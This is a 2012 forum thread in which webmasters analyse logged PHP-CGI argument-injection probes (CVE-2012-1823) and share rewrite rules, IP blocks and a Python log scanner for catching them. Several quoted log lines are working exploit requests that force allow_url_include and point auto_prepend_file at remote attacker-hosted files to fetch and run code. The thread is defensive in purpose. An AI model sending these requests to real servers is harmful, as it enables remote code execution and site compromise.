Search Engine Spider and User Agent Identification Forum

what is this POST command and why did it get a 200?

 2:37 pm on May 22, 2012 (gmt 0)

The following showed up in my log. I have no idea what it is doing. Also, this is the only entry in the log for the IP:

- - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"

The IP hasn't accessed anything on my site so I don't even know what it is posting in response to.
It looks to me as if it is trying to do something destructive, but I am only guessing.

(I am unsure which forum topic this question belongs in.)



 8:58 pm on May 22, 2012 (gmt 0)

That specific IP had a go at my server a couple of days ago. It got rejected but tried 3 times in all.

All three hits were with the UA...
Mozilla/3.0 (windows)
...same as a hit 15 minutes earlier from an AT&T IP (also blocked) and probably others.

I don't log POSTs in my security logs (they can be far too long!). The QUERYSTRING is the same though, but only on the second and third hits, not the first, which was probably just establishing contact.

I would guess it was trying to add something nasty into a php file on the site. Whether it could succeed depends on how you handle such things - or even whether your site is php in the first place. :)


 11:08 pm on May 22, 2012 (gmt 0)

Dstiles: thanks for the reply. I blocked that IP as soon as I saw the log reference.
Is there any way I can determine which php file was involved (short of examining every one of them)?


 11:22 pm on May 22, 2012 (gmt 0)

From the topic header:
why did it get a 200

Was it supposed to get a 403? I've had similar headscratchers, and they tend to come down to UA rewrites. For example, if a nasty robot pretends to be MSIE 5, it will get rewritten to a special page. So it may never meet the later rules that would have kicked in if a normal UA had made the same request.

There are other possible explanations, but they all come down to: Even though logs say 200, your visiting nasty didn't actually get what it wanted.


 11:29 pm on May 22, 2012 (gmt 0)

The /?- start suggests that the root index file was involved.


 11:55 pm on May 22, 2012 (gmt 0)

dupres01 - I would FTP to your account and have a look at files on your server, in particular the PHP folder to see if there have been any new files added. Also you might take a look at the HTML of your online index page and a couple of the other landing pages for any added code, usually at the top or the very bottom.


 12:05 am on May 23, 2012 (gmt 0)

Had the same request two days ago:

- - [20/May/2012:22:53:37 +0100] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 403 533 "-" "Mozilla/3.0 (windows)"

It was denied based upon incorrect case or syntax on "Windows".


 12:13 am on May 23, 2012 (gmt 0)

I see that I bounced it purely on the use of underscores in the URL request.

I never use underscores in URLs. This ruling also has the handy effect of blocking direct access to PHP include files as their file names often do have underscores.

If that rule hadn't been there, then the combination of POST and "php" in the URL would have kicked it to the kerb anyway.


 1:15 am on May 23, 2012 (gmt 0)

I never use underscores in URLs.

Don't recall that I ever have either, although I used one on Saturday for a temp-file-trivia.

What syntax do you use for the denial?


 1:21 am on May 23, 2012 (gmt 0)

I block "prepend" and "append" anywhere from incoming requests, although I do it myself on the server.


 1:36 am on May 23, 2012 (gmt 0)

Block requests with underscore in path:
RewriteRule _ - [F]

I redirect requests with parameters over to extensionless URLs. The RegEx patterns that capture the parameter values usually allow only lower case letters, numbers and hyphens. Everything else will lead to a 404 error at the very least.


 8:42 am on May 23, 2012 (gmt 0)

That looks like an attempt to exploit the vulnerability in some PHP-as-CGI setups, which was discussed here and elsewhere a couple of weeks ago.


It tries to use the PHP -d flag to set two php.ini entries.

The request got a 200 response because it was basically just a request for your home page, with the maliciously-intentioned query string added.

grandma genie

 2:09 am on May 24, 2012 (gmt 0)

I have also gotten a similar type of log entry.

177.8.168.n - - "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 302 - "-" "-"

And just now I found an entry that seems in some odd way connected. This visitor has sucuri.net as its initial referer (although that could be bogus). But the IP is coming from linode. And the UAs are bogus. Here are some samples:

97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example HTTP/1.1" 301 249 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example/ HTTP/1.1" 200 22302 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://sucuri.net" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 198 "-" "Ipad Iphone Safari"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 - "h**p://www.bing.com/?s=bin" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"

Just seemed odd that this visitor would go from a site about website security and malware to my ecommerce site that had recently seen an attempted exploit and then attempted its own exploit. Like it was doing some testing. Not sure if there is any connection at all, but just thought I would throw it out for your info.

By the way, the 302 redirects are happening, I believe, because my index.php file is a redirect.


 3:44 am on May 24, 2012 (gmt 0)


Two things with so-called visitor from 97.107.135.nnn:
1) why on earth are you allowing visitors with "fake google UA's" (especially this malformed one)?

2) Linode is a server farm: -


 12:01 pm on May 24, 2012 (gmt 0)

OT: More ranges on LINODE server farm.



 9:17 pm on May 24, 2012 (gmt 0)

I have a couple of extras on that list... - - - - - - - - (UK) - - -


 11:34 am on May 25, 2012 (gmt 0)

2012-05-24 19:17:11 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914) Online LLC) trying to inject info3.txt from - server farm)


 8:18 pm on May 25, 2012 (gmt 0)

- not just any server farm. Although only blocked by me in January this year my notes say "listed in uce-protect Level 2 as banned (ie for spam) - robtex claims RU, DNS claims CH and registration address is PA (Panama)". There is no rDNS for the specific IP, unusual for a server farm.

I have the complete blocked for the above reasons. It looks very dodgy to me.

Verizon is such a large range ( that anything could happen there - and frequently does. Haven't had so many this year but last year over 50 IPs blocked within that range, some for multiple offences. In all I have blocked around 450 verizon IPs over the past couple of years. Not as bad as Comcast (990) but still nasty.

grandma genie

 6:19 am on Jun 29, 2012 (gmt 0)

Just as a little follow-up, here is a sampling of log entries of a similar nature. This is just for your information.

74.55.62.nn - - [03/Jun/2012:13:48:36 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

91.224.160.nnn - - [03/Jun/2012:23:37:41 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51"

85.92.83.nnn - - [05/Jun/2012:10:45:05 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

190.60.44.nnn - - [19/Jun/2012:19:54:26 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"

213.190.161.nnn - - [23/Jun/2012:12:00:39 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.805"

200.62.177.nn - - [25/Jun/2012:12:55:27 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/id.txt%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

70.84.108.nn - - [25/Jun/2012:17:00:29 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/6.04"


 11:49 pm on Jun 29, 2012 (gmt 0)

It has been going on for a while. They are after the latest PHP-CGI remote code execution bug (CVE-2012-1823).


When PHP is used in a CGI wrapper, remote attackers may use command-line switches, such as -s, -d or -c, in a query string that will be passed to the PHP-CGI binary, leading to arbitrary code execution or source code disclosure.


If you are vulnerable the following directive might help:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]

Most of them will try a RFI (Remote File Inclusion) which is a shell most of the time.
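
As an added illustration of the mitigation logic above (not code from the thread or from any poster), here is a small Python log scanner that applies the same test as the RewriteCond (query string begins with "-" or "%2d" and contains no literal "="), then decodes the query to show which php.ini settings the request tried to force and where it wanted the prepended code to come from. The log lines are constructed samples modelled on the entries quoted in this thread, with documentation-range placeholder IPs.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format) modelled on this thread;
# 203.0.113.x / 198.51.100.x are placeholder addresses, not real attackers.
SAMPLE_LOG = """\
203.0.113.10 - - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"
203.0.113.11 - - [03/Jun/2012:23:37:41 -0400] "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 302 - "-" "-"
203.0.113.12 - - [22/May/2012:03:00:00 -0600] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://198.51.100.5/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"
203.0.113.13 - - [22/May/2012:03:01:00 -0600] "GET /index.php?page=contact-us HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.14 - - [22/May/2012:03:02:00 -0600] "GET /?-s HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def is_phpcgi_arg_injection(query):
    """Same test as the thread's RewriteCond: the raw (undecoded) query string starts
    with '-' or '%2d' and has no literal '=', so php-cgi would see it as switches,
    not as a normal key=value query."""
    return bool(re.match(r'^(%2d|-)[^=]+$', query, re.IGNORECASE))

def parse_directives(query):
    """Decode the query and collect the php.ini settings forced via -d (name -> value)."""
    decoded = unquote_plus(query)
    return dict(re.findall(r'-d\s*([A-Za-z_.]+)=(\S+)', decoded))

def scan(log_text):
    """Return one record per suspicious request; status is reported but not trusted,
    since a 200 only means the home page was served with the query attached."""
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        query = m['target'].partition('?')[2]   # Apache QUERY_STRING: after first '?'
        if not query or not is_phpcgi_arg_injection(query):
            continue
        directives = parse_directives(query)
        decoded = unquote_plus(query)
        hits.append({
            'ip': m['ip'], 'method': m['method'], 'status': int(m['status']),
            'directives': directives,
            # where the injected code would come from: POST body or a remote URL
            'payload_source': directives.get('auto_prepend_file'),
            # a bare -s asks php-cgi to print the script source instead of running it
            'source_disclosure': bool(re.search(r'(?:^|\s)-s(?:\s|$)', decoded)),
        })
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```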


 11:54 pm on Jun 29, 2012 (gmt 0)

Couple of quick fixes:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+
RewriteRule .* - [F]


 1:44 pm on Jun 30, 2012 (gmt 0)

2012-06-30 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

Note that the IP it's pointing to is UP by one from my prev post on this. This is from a different site than the prev one.
